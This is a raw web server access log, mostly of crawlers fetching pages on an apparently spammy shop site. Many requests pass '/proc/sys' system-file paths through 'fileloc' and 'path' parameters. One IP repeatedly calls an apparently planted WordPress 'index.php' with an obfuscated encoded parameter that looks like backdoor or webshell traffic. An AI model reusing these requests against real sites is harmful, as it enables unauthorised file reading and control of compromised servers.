103.7.226.137 - - [05/Nov/2025:21:03:22 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353030322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313430322q3364353461616139306637623634356164303962396661623636333263656433222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:05:24 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/cipso_cache_bucket_size&path=//proc/sys/net/ipv4 HTTP/2" 200 2514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:28 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/dev_weight_rx_bias&path=//proc/sys/net/core HTTP/2" 200 2455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:34 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/netdev_max_backlog&path=//proc/sys/net/core HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:38 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/dev_weight_tx_bias&path=//proc/sys/net/core HTTP/2" 200 2506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:03:44 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353032342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313432342q3634306635643334656232343161656233353337396137313566326434326539222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:05:44 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_established&path=//proc/sys/net/netfilter HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:48 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_events&path=//proc/sys/net/netfilter HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:52 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_buckets&path=//proc/sys/net/netfilter HTTP/2" 200 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:58 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_checksum&path=//proc/sys/net/netfilter HTTP/2" 200 2464 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:06:01 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_established&path=//proc/sys/net/netfilter HTTP/2" 200 2532 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:04:06 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353034362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313434362q6539346138386664613665326366313566323663613635373164396465376362222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:06:08 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_syn_recv&path=//proc/sys/net/netfilter HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.6 - - [05/Nov/2025:21:06:09 +0700] "GET /shopbrand446237895?kg=0445266158 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:06:12 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_syn_sent&path=//proc/sys/net/netfilter HTTP/2" 200 2480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:06:18 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_time_wait&path=//proc/sys/net/netfilter HTTP/2" 200 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:06:22 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_close_wait&path=//proc/sys/net/netfilter HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:06:25 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_last_ack&path=//proc/sys/net/netfilter HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:04:28 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353036382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313436382q3766623164396335623964383832646432326663616465323436646365313631222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:06:31 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/12&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:06:36 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_fin_wait&path=//proc/sys/net/netfilter HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.56 - - [05/Nov/2025:21:06:38 +0700] "GET /shopbrand446189826?kg=0445218194 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:06:39 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/11&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:06:45 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/10&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:06:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_max_retrans&path=//proc/sys/net/netfilter HTTP/2" 200 2531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:04:50 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353039302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313439302q3866376339393232643836653064636463393065653661366436616135393866222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:06:55 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_timeout_close&path=//proc/sys/net/netfilter HTTP/2" 200 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:00 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_timeout_open&path=//proc/sys/net/netfilter HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:04 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log_all_netns&path=//proc/sys/net/netfilter HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:10 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_timeout_closing&path=//proc/sys/net/netfilter HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:05:12 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353131322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313531322q6564623230633561366633626339636132326439346430326262663264363332222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:07:14 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_events_retry_timeout&path=//proc/sys/net/netfilter HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:17 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_acct&path=//proc/sys/net/netfilter HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:23 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_udp_timeout_stream&path=//proc/sys/net/netfilter HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:27 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_timeout_partopen&path=//proc/sys/net/netfilter HTTP/2" 200 2531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:30 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_shutdown_sent&path=//proc/sys/net/netfilter HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:33 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_timeout_request&path=//proc/sys/net/netfilter HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:05:34 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353133342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313533342q3437323166393634303165383931373930396563653261623236633230353663222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:07:39 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_heartbeat_acked&path=//proc/sys/net/netfilter HTTP/2" 200 2534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:43 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_timeout_respond&path=//proc/sys/net/netfilter HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:46 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_timeout_closereq&path=//proc/sys/net/netfilter HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_cookie_wait&path=//proc/sys/net/netfilter HTTP/2" 200 2531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:07:52 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_cookie_echoed&path=//proc/sys/net/netfilter HTTP/2" 200 2531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.74 - - [05/Nov/2025:21:07:54 +0700] "GET /shopbrand1137402768?kg=1134925226 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:07:56 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_heartbeat_sent&path=//proc/sys/net/netfilter HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:05:56 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353135362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313535362q3538656130643666646663616161356563313831623837343332623063386434222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:07:59 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_closed&path=//proc/sys/net/netfilter HTTP/2" 200 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.28 - - [05/Nov/2025:21:08:00 +0700] "GET /sitemap-subitem-2182.xml HTTP/2" 200 183231 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.23 - - [05/Nov/2025:21:08:02 +0700] "GET /shopbrand1137482654?kg=1135004938 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.31 - - [05/Nov/2025:21:08:02 +0700] "GET /shopbrand1137460145?kg=1134982478 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:08:05 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_timeout_timewait&path=//proc/sys/net/netfilter HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:07 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_moderate_rcvbuf&path=//proc/sys/net/ipv4 HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:11 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_shutdown_recd&path=//proc/sys/net/netfilter HTTP/2" 200 2532 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:14 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/7&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:06:18 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353137382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313537382q3837666538333565313238643835663561656137616435353731613136643931222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:08:21 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/5&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:24 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/2&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:28 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/4&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:31 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/3&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:38 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/1&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:06:40 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353230302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313630302q6334623461336334313162303331303536663863633965663334633731633066222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:08:41 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/6&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:44 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/8&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:50 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_frag6_low_thresh&path=//proc/sys/net/netfilter HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:08:54 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/9&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2461 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:00 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_loose&path=//proc/sys/net/netfilter HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:07:02 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353232322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313632322q3463653836613561316636656634313864613063303732663265343334386136222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:09:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_frag6_high_thresh&path=//proc/sys/net/netfilter HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:11 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_loose&path=//proc/sys/net/netfilter HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:14 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_expect_max&path=//proc/sys/net/netfilter HTTP/2" 200 2521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:20 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_icmpv6_timeout&path=//proc/sys/net/netfilter HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:24 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_frag6_timeout&path=//proc/sys/net/netfilter HTTP/2" 200 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:07:25 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353234352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313634352q3535303733653832356637353434333033393538343139333262313739336133222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:09:28 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_helper&path=//proc/sys/net/netfilter HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:35 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_be_liberal&path=//proc/sys/net/netfilter HTTP/2" 200 2523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:38 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_tcp_max_retrans&path=//proc/sys/net/netfilter HTTP/2" 200 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:46 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_sctp_timeout_shutdown_ack_sent&path=//proc/sys/net/netfilter HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
